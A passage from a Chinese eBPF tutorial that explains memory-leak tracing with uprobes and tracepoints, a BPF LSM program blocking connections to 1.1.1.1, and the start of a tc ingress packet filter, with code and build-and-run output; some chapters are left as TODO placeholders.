<p>最后定义了 <code>BPF_KPROBE(malloc_enter, size_t size)</code>,它会在 <code>malloc</code> 函数被调用时被 BPF uprobe 拦截执行,并通过 <code>gen_alloc_enter</code> 来记录内存分配大小。
|
||
我们刚刚分析了内存分配的入口函数 <code>gen_alloc_enter</code>,现在我们来关注这个过程的退出部分。具体来说,我们将讨论 <code>gen_alloc_exit2</code> 函数以及如何从内存分配调用中获取返回的内存地址。</p>
|
||
<pre><code class="language-c">static int gen_alloc_exit2(void *ctx, u64 address)
|
||
{
|
||
const pid_t pid = bpf_get_current_pid_tgid() >> 32;
|
||
struct alloc_info info;
|
||
|
||
const u64* size = bpf_map_lookup_elem(&sizes, &pid);
|
||
if (!size)
|
||
return 0; // missed alloc entry
|
||
|
||
__builtin_memset(&info, 0, sizeof(info));
|
||
|
||
info.size = *size;
|
||
bpf_map_delete_elem(&sizes, &pid);
|
||
|
||
if (address != 0) {
|
||
info.timestamp_ns = bpf_ktime_get_ns();
|
||
|
||
info.stack_id = bpf_get_stackid(ctx, &stack_traces, stack_flags);
|
||
|
||
bpf_map_update_elem(&allocs, &address, &info, BPF_ANY);
|
||
|
||
update_statistics_add(info.stack_id, info.size);
|
||
}
|
||
|
||
if (trace_all) {
|
||
bpf_printk("alloc exited, size = %lu, result = %lx\n",
|
||
info.size, address);
|
||
}
|
||
|
||
return 0;
|
||
}
|
||
static int gen_alloc_exit(struct pt_regs *ctx)
|
||
{
|
||
return gen_alloc_exit2(ctx, PT_REGS_RC(ctx));
|
||
}
|
||
|
||
SEC("uretprobe")
|
||
int BPF_KRETPROBE(malloc_exit)
|
||
{
|
||
return gen_alloc_exit(ctx);
|
||
}
|
||
</code></pre>
|
||
<p><code>gen_alloc_exit2</code> 函数在内存分配操作完成时被调用,这个函数接收两个参数,一个是上下文 <code>ctx</code>,另一个是内存分配函数返回的内存地址 <code>address</code>。</p>
|
||
<p>首先,它获取当前线程的 PID,然后使用这个 PID 作为键在 <code>sizes</code> 这个 map 中查找对应的内存分配大小。如果没有找到(也就是说,没有对应的内存分配操作的入口),函数就会直接返回。</p>
|
||
<p>接着,函数清除 <code>info</code> 结构体的内容,并设置它的 <code>size</code> 字段为之前在 map 中找到的内存分配大小。并从 <code>sizes</code> 这个 map 中删除相应的元素,因为此时内存分配操作已经完成,不再需要这个信息。</p>
|
||
<p>接下来,如果 <code>address</code> 不为 0(也就是说,内存分配操作成功了),函数就会进一步收集一些额外的信息。首先,它获取当前的时间戳作为内存分配完成的时间,并获取当前的堆栈跟踪。这些信息都会被储存在 <code>info</code> 结构体中,并随后更新到 <code>allocs</code> 这个 map 中。</p>
|
||
<p>最后,函数调用 <code>update_statistics_add</code> 更新统计数据,如果启用了所有内存分配操作的跟踪,函数还会打印一些关于内存分配操作的信息。</p>
|
||
<p>请注意,<code>gen_alloc_exit</code> 函数是 <code>gen_alloc_exit2</code> 的一个包装,它将 <code>PT_REGS_RC(ctx)</code> 作为 <code>address</code> 参数传递给 <code>gen_alloc_exit2</code>。<code>在我们的讨论中,我们刚刚提到在</code>gen_alloc_exit2<code>函数中,调用了</code>update_statistics_add` 函数以更新内存分配的统计数据。下面我们详细看一下这个函数的具体实现。</p>
|
||
<pre><code class="language-c">static void update_statistics_add(u64 stack_id, u64 sz)
|
||
{
|
||
union combined_alloc_info *existing_cinfo;
|
||
|
||
existing_cinfo = bpf_map_lookup_or_try_init(&combined_allocs, &stack_id, &initial_cinfo);
|
||
if (!existing_cinfo)
|
||
return;
|
||
|
||
const union combined_alloc_info incremental_cinfo = {
|
||
.total_size = sz,
|
||
.number_of_allocs = 1
|
||
};
|
||
|
||
__sync_fetch_and_add(&existing_cinfo->bits, incremental_cinfo.bits);
|
||
}
|
||
</code></pre>
|
||
<p><code>update_statistics_add</code> 函数接收两个参数:当前的堆栈 ID <code>stack_id</code> 以及内存分配的大小 <code>sz</code>。这两个参数都在内存分配事件中收集到,并且用于更新内存分配的统计数据。</p>
|
||
<p>首先,函数尝试在 <code>combined_allocs</code> 这个 map 中查找键值为当前堆栈 ID 的元素,如果找不到,就用 <code>initial_cinfo</code>(这是一个默认的 combined_alloc_info 结构体,所有字段都为零)来初始化新的元素。</p>
|
||
<p>接着,函数创建一个 <code>incremental_cinfo</code>,并设置它的 <code>total_size</code> 为当前内存分配的大小,设置 <code>number_of_allocs</code> 为 1。这是因为每次调用 <code>update_statistics_add</code> 函数都表示有一个新的内存分配事件发生,而这个事件的内存分配大小就是 <code>sz</code>。</p>
|
||
<p>最后,函数使用 <code>__sync_fetch_and_add</code> 函数原子地将 <code>incremental_cinfo</code> 的值加到 <code>existing_cinfo</code> 中。请注意这个步骤是线程安全的,即使有多个线程并发地调用 <code>update_statistics_add</code> 函数,每个内存分配事件也能正确地记录到统计数据中。</p>
|
||
<p>总的来说,<code>update_statistics_add</code> 函数实现了内存分配统计的更新逻辑,通过维护每个堆栈 ID 的内存分配总量和次数,我们可以深入了解到程序的内存分配行为。
|
||
在我们对内存分配的统计跟踪过程中,我们不仅要统计内存的分配,还要考虑内存的释放。在上述代码中,我们定义了一个名为 <code>update_statistics_del</code> 的函数,其作用是在内存释放时更新统计信息。而 <code>gen_free_enter</code> 函数则是在进程调用 <code>free</code> 函数时被执行。</p>
|
||
<pre><code class="language-c">static void update_statistics_del(u64 stack_id, u64 sz)
|
||
{
|
||
union combined_alloc_info *existing_cinfo;
|
||
|
||
existing_cinfo = bpf_map_lookup_elem(&combined_allocs, &stack_id);
|
||
if (!existing_cinfo) {
|
||
bpf_printk("failed to lookup combined allocs\n");
|
||
return;
|
||
}
|
||
|
||
const union combined_alloc_info decremental_cinfo = {
|
||
.total_size = sz,
|
||
.number_of_allocs = 1
|
||
};
|
||
|
||
__sync_fetch_and_sub(&existing_cinfo->bits, decremental_cinfo.bits);
|
||
}
|
||
</code></pre>
|
||
<p><code>update_statistics_del</code> 函数的参数为堆栈 ID 和要释放的内存块大小。函数首先在 <code>combined_allocs</code> 这个 map 中使用当前的堆栈 ID 作为键来查找相应的 <code>combined_alloc_info</code> 结构体。如果找不到,就输出错误信息,然后函数返回。如果找到了,就会构造一个名为 <code>decremental_cinfo</code> 的 <code>combined_alloc_info</code> 结构体,设置它的 <code>total_size</code> 为要释放的内存大小,设置 <code>number_of_allocs</code> 为 1。然后使用 <code>__sync_fetch_and_sub</code> 函数原子地从 <code>existing_cinfo</code> 中减去 <code>decremental_cinfo</code> 的值。请注意,这里的 <code>number_of_allocs</code> 是负数,表示减少了一个内存分配。</p>
|
||
<pre><code class="language-c">static int gen_free_enter(const void *address)
|
||
{
|
||
const u64 addr = (u64)address;
|
||
|
||
const struct alloc_info *info = bpf_map_lookup_elem(&allocs, &addr);
|
||
if (!info)
|
||
return 0;
|
||
|
||
bpf_map_delete_elem(&allocs, &addr);
|
||
update_statistics_del(info->stack_id, info->size);
|
||
|
||
if (trace_all) {
|
||
bpf_printk("free entered, address = %lx, size = %lu\n",
|
||
address, info->size);
|
||
}
|
||
|
||
return 0;
|
||
}
|
||
|
||
SEC("uprobe")
|
||
int BPF_KPROBE(free_enter, void *address)
|
||
{
|
||
return gen_free_enter(address);
|
||
}
|
||
</code></pre>
|
||
<p>接下来看 <code>gen_free_enter</code> 函数。它接收一个地址作为参数,这个地址是内存分配的结果,也就是将要释放的内存的起始地址。函数首先在 <code>allocs</code> 这个 map 中使用这个地址作为键来查找对应的 <code>alloc_info</code> 结构体。如果找不到,那么就直接返回,因为这意味着这个地址并没有被分配过。如果找到了,那么就删除这个元素,并且调用 <code>update_statistics_del</code> 函数来更新统计数据。最后,如果启用了全局追踪,那么还会输出一条信息,包括这个地址以及它的大小。
|
||
在我们追踪和统计内存分配的同时,我们也需要对内核态的内存分配和释放进行追踪。在Linux内核中,kmem_cache_alloc函数和kfree函数分别用于内核态的内存分配和释放。</p>
|
||
<pre><code class="language-c">SEC("tracepoint/kmem/kfree")
|
||
int memleak__kfree(void *ctx)
|
||
{
|
||
const void *ptr;
|
||
|
||
if (has_kfree()) {
|
||
struct trace_event_raw_kfree___x *args = ctx;
|
||
ptr = BPF_CORE_READ(args, ptr);
|
||
} else {
|
||
struct trace_event_raw_kmem_free___x *args = ctx;
|
||
ptr = BPF_CORE_READ(args, ptr);
|
||
}
|
||
|
||
return gen_free_enter(ptr);
|
||
}
|
||
</code></pre>
|
||
<p>上述代码片段定义了一个函数memleak__kfree,这是一个bpf程序,会在内核调用kfree函数时执行。首先,该函数检查是否存在kfree函数。如果存在,则会读取传递给kfree函数的参数(即要释放的内存块的地址),并保存到变量ptr中;否则,会读取传递给kmem_free函数的参数(即要释放的内存块的地址),并保存到变量ptr中。接着,该函数会调用之前定义的gen_free_enter函数来处理该内存块的释放。</p>
|
||
<pre><code class="language-c">SEC("tracepoint/kmem/kmem_cache_alloc")
|
||
int memleak__kmem_cache_alloc(struct trace_event_raw_kmem_alloc *ctx)
|
||
{
|
||
if (wa_missing_free)
|
||
gen_free_enter(ctx->ptr);
|
||
|
||
gen_alloc_enter(ctx->bytes_alloc);
|
||
|
||
return gen_alloc_exit2(ctx, (u64)(ctx->ptr));
|
||
}
|
||
</code></pre>
|
||
<p>这段代码定义了一个函数 memleak__kmem_cache_alloc,这也是一个bpf程序,会在内核调用 kmem_cache_alloc 函数时执行。如果标记 wa_missing_free 被设置,则调用 gen_free_enter 函数处理可能遗漏的释放操作。然后,该函数会调用 gen_alloc_enter 函数来处理内存分配,最后调用gen_alloc_exit2函数记录分配的结果。</p>
|
||
<p>这两个 bpf 程序都使用了 SEC 宏定义了对应的 tracepoint,以便在相应的内核函数被调用时得到执行。在Linux内核中,tracepoint 是一种可以在内核中插入的静态钩子,可以用来收集运行时的内核信息,它在调试和性能分析中非常有用。</p>
|
||
<p>在理解这些代码的过程中,要注意 BPF_CORE_READ 宏的使用。这个宏用于在 bpf 程序中读取内核数据。在 bpf 程序中,我们不能直接访问内核内存,而需要使用这样的宏来安全地读取数据。</p>
|
||
<h3 id="用户态程序-1"><a class="header" href="#用户态程序-1">用户态程序</a></h3>
|
||
<p>在理解 BPF 内核部分之后,我们转到用户空间程序。用户空间程序与BPF内核程序紧密配合,它负责将BPF程序加载到内核,设置和管理BPF map,以及处理从BPF程序收集到的数据。用户态程序较长,我们这里可以简要参考一下它的挂载点。</p>
|
||
<pre><code class="language-c">int attach_uprobes(struct memleak_bpf *skel)
|
||
{
|
||
ATTACH_UPROBE_CHECKED(skel, malloc, malloc_enter);
|
||
ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit);
|
||
|
||
ATTACH_UPROBE_CHECKED(skel, calloc, calloc_enter);
|
||
ATTACH_URETPROBE_CHECKED(skel, calloc, calloc_exit);
|
||
|
||
ATTACH_UPROBE_CHECKED(skel, realloc, realloc_enter);
|
||
ATTACH_URETPROBE_CHECKED(skel, realloc, realloc_exit);
|
||
|
||
ATTACH_UPROBE_CHECKED(skel, mmap, mmap_enter);
|
||
ATTACH_URETPROBE_CHECKED(skel, mmap, mmap_exit);
|
||
|
||
ATTACH_UPROBE_CHECKED(skel, posix_memalign, posix_memalign_enter);
|
||
ATTACH_URETPROBE_CHECKED(skel, posix_memalign, posix_memalign_exit);
|
||
|
||
ATTACH_UPROBE_CHECKED(skel, memalign, memalign_enter);
|
||
ATTACH_URETPROBE_CHECKED(skel, memalign, memalign_exit);
|
||
|
||
ATTACH_UPROBE_CHECKED(skel, free, free_enter);
|
||
ATTACH_UPROBE_CHECKED(skel, munmap, munmap_enter);
|
||
|
||
// the following probes are intentinally allowed to fail attachment
|
||
|
||
// deprecated in libc.so bionic
|
||
ATTACH_UPROBE(skel, valloc, valloc_enter);
|
||
ATTACH_URETPROBE(skel, valloc, valloc_exit);
|
||
|
||
// deprecated in libc.so bionic
|
||
ATTACH_UPROBE(skel, pvalloc, pvalloc_enter);
|
||
ATTACH_URETPROBE(skel, pvalloc, pvalloc_exit);
|
||
|
||
// added in C11
|
||
ATTACH_UPROBE(skel, aligned_alloc, aligned_alloc_enter);
|
||
ATTACH_URETPROBE(skel, aligned_alloc, aligned_alloc_exit);
|
||
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>在这段代码中,我们看到一个名为<code>attach_uprobes</code>的函数,该函数负责将uprobes(用户空间探测点)挂载到内存分配和释放函数上。在Linux中,uprobes是一种内核机制,可以在用户空间程序中的任意位置设置断点,这使得我们可以非常精确地观察和控制用户空间程序的行为。</p>
|
||
<p>这里,每个内存相关的函数都通过两个uprobes进行跟踪:一个在函数入口(enter),一个在函数退出(exit)。因此,每当这些函数被调用或返回时,都会触发一个uprobes事件,进而触发相应的BPF程序。</p>
|
||
<p>在具体的实现中,我们使用了<code>ATTACH_UPROBE</code>和<code>ATTACH_URETPROBE</code>两个宏来附加uprobes和uretprobes(函数返回探测点)。每个宏都需要三个参数:BPF程序的骨架(skel),要监视的函数名,以及要触发的BPF程序的名称。</p>
|
||
<p>这些挂载点包括常见的内存分配函数,如malloc、calloc、realloc、mmap、posix_memalign、memalign、free等,以及对应的退出点。另外,我们也观察一些可能的分配函数,如valloc、pvalloc、aligned_alloc等,尽管它们可能不总是存在。</p>
|
||
<p>这些挂载点的目标是捕获所有可能的内存分配和释放事件,从而使我们的内存泄露检测工具能够获取到尽可能全面的数据。这种方法可以让我们不仅能跟踪到内存分配和释放,还能得到它们发生的上下文信息,例如调用栈和调用次数,从而帮助我们定位和修复内存泄露问题。</p>
|
||
<p>注意,一些内存分配函数可能并不存在或已弃用,比如valloc、pvalloc等,因此它们的附加可能会失败。在这种情况下,我们允许附加失败,并不会阻止程序的执行。这是因为我们更关注的是主流和常用的内存分配函数,而这些已经被弃用的函数往往在实际应用中较少使用。</p>
|
||
<p>完整的源代码:https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/16-memleak</p>
|
||
<h2 id="编译运行-5"><a class="header" href="#编译运行-5">编译运行</a></h2>
|
||
<pre><code class="language-console">$ git clone https://github.com/iovisor/bcc.git --recurse-submodules
|
||
$ cd libbpf-tools/
|
||
$ make memleak
|
||
$ sudo ./memleak
|
||
using default object: libc.so.6
|
||
using page size: 4096
|
||
tracing kernel: true
|
||
Tracing outstanding memory allocs... Hit Ctrl-C to end
|
||
[17:17:27] Top 10 stacks with outstanding allocations:
|
||
1236992 bytes in 302 allocations from stack
|
||
0 [<ffffffff812c8f43>] <null sym>
|
||
1 [<ffffffff812c8f43>] <null sym>
|
||
2 [<ffffffff812a9d42>] <null sym>
|
||
3 [<ffffffff812aa392>] <null sym>
|
||
4 [<ffffffff810df0cb>] <null sym>
|
||
5 [<ffffffff81edc3fd>] <null sym>
|
||
6 [<ffffffff82000b62>] <null sym>
|
||
...
|
||
</code></pre>
|
||
<h2 id="总结-14"><a class="header" href="#总结-14">总结</a></h2>
|
||
<p>通过本篇 eBPF 入门实践教程,您已经学习了如何编写 Memleak eBPF 监控程序,以实时监控程序的内存泄漏。您已经了解了 eBPF 在内存监控方面的应用,学会了使用 BPF API 编写 eBPF 程序,创建和使用 eBPF maps,并且明白了如何用 eBPF 工具监测和分析内存泄漏问题。我们展示了一个详细的例子,帮助您理解 eBPF 代码的运行流程和原理。</p>
|
||
<p>您可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<p>接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。希望这些知识和技巧能帮助您更好地了解和使用 eBPF,以解决实际工作中遇到的问题。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门实践教程编写-ebpf-程序-biopattern-统计随机顺序磁盘-io"><a class="header" href="#ebpf-入门实践教程编写-ebpf-程序-biopattern-统计随机顺序磁盘-io">eBPF 入门实践教程:编写 eBPF 程序 Biopattern: 统计随机/顺序磁盘 I/O</a></h1>
|
||
<h2 id="背景-1"><a class="header" href="#背景-1">背景</a></h2>
|
||
<p>Biopattern 可以统计随机/顺序磁盘I/O次数的比例。</p>
|
||
<p>TODO</p>
|
||
<h2 id="实现原理-1"><a class="header" href="#实现原理-1">实现原理</a></h2>
|
||
<p>Biopattern 的ebpf代码在 tracepoint/block/block_rq_complete 挂载点下实现。在磁盘完成IO请求
|
||
后,程序会经过此挂载点。Biopattern 内部存有一张以设备号为主键的哈希表,当程序经过挂载点时, Biopattern
|
||
会获得操作信息,根据哈希表中该设备的上一次操作记录来判断本次操作是随机IO还是顺序IO,并更新操作计数。</p>
|
||
<h2 id="编写-ebpf-程序-1"><a class="header" href="#编写-ebpf-程序-1">编写 eBPF 程序</a></h2>
|
||
<p>TODO</p>
|
||
<h3 id="总结-15"><a class="header" href="#总结-15">总结</a></h3>
|
||
<p>Biopattern 可以展现随机/顺序磁盘I/O次数的比例,对于开发者把握整体I/O情况有较大帮助。</p>
|
||
<p>TODO</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="更多的参考资料"><a class="header" href="#更多的参考资料">更多的参考资料</a></h1>
|
||
<p>TODO</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门实践教程使用-lsm-进行安全检测防御"><a class="header" href="#ebpf-入门实践教程使用-lsm-进行安全检测防御">eBPF 入门实践教程:使用 LSM 进行安全检测防御</a></h1>
|
||
<p>eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。安全方面的 eBPF 应用也是如此,本文将介绍如何使用 eBPF LSM(Linux Security Modules)机制实现一个简单的安全检查程序。</p>
|
||
<h2 id="背景-2"><a class="header" href="#背景-2">背景</a></h2>
|
||
<p>LSM 从 Linux 2.6 开始成为官方内核的一个安全框架,基于此的安全实现包括 SELinux 和 AppArmor 等。在 Linux 5.7 引入 BPF LSM 后,系统开发人员已经能够自由地实现函数粒度的安全检查能力,本文就提供了这样一个案例:限制通过 socket connect 函数对特定 IPv4 地址进行访问的 BPF LSM 程序。(可见其控制精度是很高的)</p>
|
||
<h2 id="lsm-概述"><a class="header" href="#lsm-概述">LSM 概述</a></h2>
|
||
<p>LSM(Linux Security Modules)是 Linux 内核中用于支持各种计算机安全模型的框架。LSM 在 Linux 内核安全相关的关键路径上预置了一批 hook 点,从而实现了内核和安全模块的解耦,使不同的安全模块可以自由地在内核中加载/卸载,无需修改原有的内核代码就可以加入安全检查功能。</p>
|
||
<p>在过去,使用 LSM 主要通过配置已有的安全模块(如 SELinux 和 AppArmor)或编写自己的内核模块;而在 Linux 5.7 引入 BPF LSM 机制后,一切都变得不同了:现在,开发人员可以通过 eBPF 编写自定义的安全策略,并将其动态加载到内核中的 LSM 挂载点,而无需配置或编写内核模块。</p>
|
||
<p>现在 LSM 支持的 hook 点包括但不限于:</p>
|
||
<ul>
|
||
<li>对文件的打开、创建、删除和移动等;</li>
|
||
<li>文件系统的挂载;</li>
|
||
<li>对 task 和 process 的操作;</li>
|
||
<li>对 socket 的操作(创建、绑定 socket,发送和接收消息等);</li>
|
||
</ul>
|
||
<p>更多 hook 点可以参考 <a href="https://github.com/torvalds/linux/blob/master/include/linux/lsm_hooks.h">lsm_hooks.h</a>。</p>
|
||
<h2 id="确认-bpf-lsm-是否可用"><a class="header" href="#确认-bpf-lsm-是否可用">确认 BPF LSM 是否可用</a></h2>
|
||
<p>首先,请确认内核版本高于 5.7。接下来,可以通过</p>
|
||
<pre><code class="language-console">$ cat /boot/config-$(uname -r) | grep BPF_LSM
|
||
CONFIG_BPF_LSM=y
|
||
</code></pre>
|
||
<p>判断是否内核是否支持 BPF LSM。上述条件都满足的情况下,可以通过</p>
|
||
<pre><code class="language-console">$ cat /sys/kernel/security/lsm
|
||
ndlock,lockdown,yama,integrity,apparmor
|
||
</code></pre>
|
||
<p>查看输出是否包含 bpf 选项,如果输出不包含(像上面的例子),可以通过修改 <code>/etc/default/grub</code>:</p>
|
||
<pre><code class="language-conf">GRUB_CMDLINE_LINUX="lsm=ndlock,lockdown,yama,integrity,apparmor,bpf"
|
||
</code></pre>
|
||
<p>并通过 <code>update-grub2</code> 命令更新 grub 配置(不同系统的对应命令可能不同),然后重启系统。</p>
|
||
<h2 id="编写-ebpf-程序-2"><a class="header" href="#编写-ebpf-程序-2">编写 eBPF 程序</a></h2>
|
||
<pre><code class="language-C">// lsm-connect.bpf.c
|
||
#include "vmlinux.h"
|
||
#include <bpf/bpf_core_read.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
|
||
#define EPERM 1
|
||
#define AF_INET 2
|
||
|
||
const __u32 blockme = 16843009; // 1.1.1.1 -> int
|
||
|
||
SEC("lsm/socket_connect")
|
||
int BPF_PROG(restrict_connect, struct socket *sock, struct sockaddr *address, int addrlen, int ret)
|
||
{
|
||
// Satisfying "cannot override a denial" rule
|
||
if (ret != 0)
|
||
{
|
||
return ret;
|
||
}
|
||
|
||
// Only IPv4 in this example
|
||
if (address->sa_family != AF_INET)
|
||
{
|
||
return 0;
|
||
}
|
||
|
||
// Cast the address to an IPv4 socket address
|
||
struct sockaddr_in *addr = (struct sockaddr_in *)address;
|
||
|
||
// Where do you want to go?
|
||
__u32 dest = addr->sin_addr.s_addr;
|
||
bpf_printk("lsm: found connect to %d", dest);
|
||
|
||
if (dest == blockme)
|
||
{
|
||
bpf_printk("lsm: blocking %d", dest);
|
||
return -EPERM;
|
||
}
|
||
return 0;
|
||
}
|
||
|
||
</code></pre>
|
||
<p>这是一段 C 实现的 eBPF 内核侧代码,它会阻碍所有试图通过 socket 对 1.1.1.1 的连接操作,其中:</p>
|
||
<ul>
|
||
<li><code>SEC("lsm/socket_connect")</code> 宏指出该程序期望的挂载点;</li>
|
||
<li>程序通过 <code>BPF_PROG</code> 宏定义(详情可查看 <a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/tools/lib/bpf/bpf_tracing.h">tools/lib/bpf/bpf_tracing.h</a>);</li>
|
||
<li><code>restrict_connect</code> 是 <code>BPF_PROG</code> 宏要求的程序名;</li>
|
||
<li><code>ret</code> 是该挂载点上(潜在的)当前函数之前的 LSM 检查程序的返回值;</li>
|
||
</ul>
|
||
<p>整个程序的思路不难理解:</p>
|
||
<ul>
|
||
<li>首先,若其他安全检查函数返回值不为 0(不通过),则无需检查,直接返回不通过;</li>
|
||
<li>接下来,判断是否为 IPV4 的连接请求,并比较试图连接的地址是否为 1.1.1.1;</li>
|
||
<li>若请求地址为 1.1.1.1 则拒绝连接,否则允许连接;</li>
|
||
</ul>
|
||
<p>在程序运行期间,所有通过 socket 的连接操作都会被输出到 <code>/sys/kernel/debug/tracing/trace_pipe</code>。</p>
|
||
<h2 id="编译运行-6"><a class="header" href="#编译运行-6">编译运行</a></h2>
|
||
<p>通过容器编译:</p>
|
||
<pre><code class="language-console">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>或是通过 <code>ecc</code> 编译:</p>
|
||
<pre><code class="language-console">$ ecc lsm-connect.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>并通过 <code>ecli</code> 运行:</p>
|
||
<pre><code class="language-shell">sudo ecli run package.json
|
||
</code></pre>
|
||
<p>接下来,可以打开另一个 terminal,并尝试访问 1.1.1.1:</p>
|
||
<pre><code class="language-console">$ ping 1.1.1.1
|
||
ping: connect: Operation not permitted
|
||
$ curl 1.1.1.1
|
||
curl: (7) Couldn't connect to server
|
||
$ wget 1.1.1.1
|
||
--2023-04-23 08:41:18-- (try: 2) http://1.1.1.1/
|
||
Connecting to 1.1.1.1:80... failed: Operation not permitted.
|
||
Retrying.
|
||
</code></pre>
|
||
<p>同时,我们可以查看 <code>bpf_printk</code> 的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
ping-7054 [000] d...1 6313.430872: bpf_trace_printk: lsm: found connect to 16843009
|
||
ping-7054 [000] d...1 6313.430874: bpf_trace_printk: lsm: blocking 16843009
|
||
curl-7058 [000] d...1 6316.346582: bpf_trace_printk: lsm: found connect to 16843009
|
||
curl-7058 [000] d...1 6316.346584: bpf_trace_printk: lsm: blocking 16843009
|
||
wget-7061 [000] d...1 6318.800698: bpf_trace_printk: lsm: found connect to 16843009
|
||
wget-7061 [000] d...1 6318.800700: bpf_trace_printk: lsm: blocking 16843009
|
||
</code></pre>
|
||
<p>完整源代码:<a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/19-lsm-connect">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/19-lsm-connect</a></p>
|
||
<h2 id="总结-16"><a class="header" href="#总结-16">总结</a></h2>
|
||
<p>本文介绍了如何使用 BPF LSM 来限制通过 socket 对特定 IPv4 地址的访问。我们可以通过修改 GRUB 配置文件来开启 LSM 的 BPF 挂载点。在 eBPF 程序中,我们通过 <code>BPF_PROG</code> 宏定义函数,并通过 <code>SEC</code> 宏指定挂载点;在函数实现上,遵循 LSM 安全检查模块中 "cannot override a denial" 的原则,并根据 socket 连接请求的目的地址对该请求进行限制。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<h2 id="参考"><a class="header" href="#参考">参考</a></h2>
|
||
<ul>
|
||
<li><a href="https://github.com/leodido/demo-cloud-native-ebpf-day">https://github.com/leodido/demo-cloud-native-ebpf-day</a></li>
|
||
<li><a href="https://aya-rs.dev/book/programs/lsm/#writing-lsm-bpf-program">https://aya-rs.dev/book/programs/lsm/#writing-lsm-bpf-program</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门实践教程二十使用-ebpf-进行-tc-流量控制"><a class="header" href="#ebpf-入门实践教程二十使用-ebpf-进行-tc-流量控制">eBPF 入门实践教程二十:使用 eBPF 进行 tc 流量控制</a></h1>
|
||
<h2 id="背景-3"><a class="header" href="#背景-3">背景</a></h2>
|
||
<p>Linux 的流量控制子系统(Traffic Control, tc)在内核中存在了多年,类似于 iptables 和 netfilter 的关系,tc 也包括一个用户态的 tc 程序和内核态的 trafiic control 框架,主要用于从速率、顺序等方面控制数据包的发送和接收。从 Linux 4.1 开始,tc 增加了一些新的挂载点,并支持将 eBPF 程序作为 filter 加载到这些挂载点上。</p>
|
||
<h2 id="tc-概述"><a class="header" href="#tc-概述">tc 概述</a></h2>
|
||
<p>从协议栈上看,tc 位于链路层,其所在位置已经完成了 sk_buff 的分配,要晚于 xdp。为了实现对数据包发送和接收的控制,tc 使用队列结构来临时保存并组织数据包,在 tc 子系统中对应的数据结构和算法控制机制被抽象为 qdisc(Queueing discipline),其对外暴露数据包入队和出队的两个回调接口,并在内部隐藏排队算法实现。在 qdisc 中我们可以基于 filter 和 class 实现复杂的树形结构,其中 filter 被挂载到 qdisc 或 class 上用于实现具体的过滤逻辑,返回值决定了该数据包是否属于特定 class。</p>
|
||
<p>当数据包到达顶层 qdisc 时,其入队接口被调用,其上挂载的 filter 被依次执行直到一个 filter 匹配成功;此后数据包被送入该 filter 指向的 class,进入该 class 配置的 qdisc 处理流程中。tc 框架提供了所谓 classifier-action 机制,即在数据包匹配到特定 filter 时执行该 filter 所挂载的 action 对数据包进行处理,实现了完整的数据包分类和处理机制。</p>
|
||
<p>现有的 tc 为 eBPF 提供了 direct-action 模式,它使得一个作为 filter 加载的 eBPF 程序可以返回像 <code>TC_ACT_OK</code> 等 tc action 的返回值,而不是像传统的 filter 那样仅仅返回一个 classid 并把对数据包的处理交给 action 模块。现在,eBPF 程序可以被挂载到特定的 qdisc 上,并完成对数据包的分类和处理动作。</p>
|
||
<h2 id="编写-ebpf-程序-3"><a class="header" href="#编写-ebpf-程序-3">编写 eBPF 程序</a></h2>
|
||
<pre><code class="language-c">#include <vmlinux.h>
|
||
#include <bpf/bpf_endian.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
|
||
#define TC_ACT_OK 0
|
||
#define ETH_P_IP 0x0800 /* Internet Protocol packet */
|
||
|
||
/// @tchook {"ifindex":1, "attach_point":"BPF_TC_INGRESS"}
|
||
/// @tcopts {"handle":1, "priority":1}
|
||
SEC("tc")
|
||
int tc_ingress(struct __sk_buff *ctx)
|
||
{
|
||
void *data_end = (void *)(__u64)ctx->data_end;
|
||
void *data = (void *)(__u64)ctx->data;
|
||
struct ethhdr *l2;
|
||
struct iphdr *l3;
|
||
|
||
if (ctx->protocol != bpf_htons(ETH_P_IP))
|
||
return TC_ACT_OK;
|
||
|
||
l2 = data;
|
||
if ((void *)(l2 + 1) > data_end)
|
||
return TC_ACT_OK;
|
||
|
||
l3 = (struct iphdr *)(l2 + 1);
|
||
if ((void *)(l3 + 1) > data_end)
|
||
return TC_ACT_OK;
|
||
|
||
bpf_printk("Got IP packet: tot_len: %d, ttl: %d", bpf_ntohs(l3->tot_len), l3->ttl);
|
||
return TC_ACT_OK;
|
||
}
|
||
|
||
char __license[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
